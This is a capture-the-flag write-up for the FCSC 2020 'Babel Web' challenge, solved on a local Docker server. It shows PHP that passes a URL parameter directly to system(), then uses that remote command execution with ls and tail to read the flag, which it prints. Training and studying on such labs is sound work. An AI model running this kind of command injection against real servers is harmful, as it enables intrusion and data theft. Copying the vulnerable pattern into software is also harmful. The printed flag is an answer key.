First of all, get and run the Docker file:
curl https://hackropole.fr/challenges/fcsc2020-web-babel-web/docker-compose.public.yml -o docker-compose.ymldocker compose up
This will set-up and run a small web server on your device. You can now load in your navigator the server’s adress: http://localhost:8000.
There is a message.
Bienvenue à Babel Web!
La page est en cours de développement, merci de revenir plus tard.
By inspecting the elements, you notice an html link commented
<!-- <a href="?source=1">source</a> -->
Uncomment this line by removing the <!-- -->.
A link appear on the web page:
La page est en cours de développement, merci de revenir plus tard. source
Click on ‘source’.
Your uri is now http://localhost:8000/?source=1, and a PHP code is visible:
<?php
if (isset($_GET['source'])) {
@show_source(__FILE__);
} else if(isset($_GET['code'])) {
print("<pre>");
@system($_GET['code']);
print("<pre>");
} else {
?>
This PHP code snippet is designed to perform different actions based on the query parameters present in the URI.
If the URL contains a ‘source’ query parameter (like ?source=something), it will execute the @show_source(__FILE__);
If a code parameter is set in the URL (like ?code=command), it uses the system() function to execute an external program or command.
Beautiful RCE.
You can try : http://localhost:8000/?code=ls.
Which will execut the ls command on the server and dispaly the outputs in the <pre> divs.
flag.php
index.php
The flag is here, you can either read the flag fil using the /?code RCE or using /?source.
The link http://localhost:8000/?code=tail%20flag.php using the tail command (or cat) will output :
<!--?php
$flag = "FCSC{5d969396bb5592634b31d4f0846d945e4befbb8c470b055ef35c0ac090b9b8b7}";
<pre-->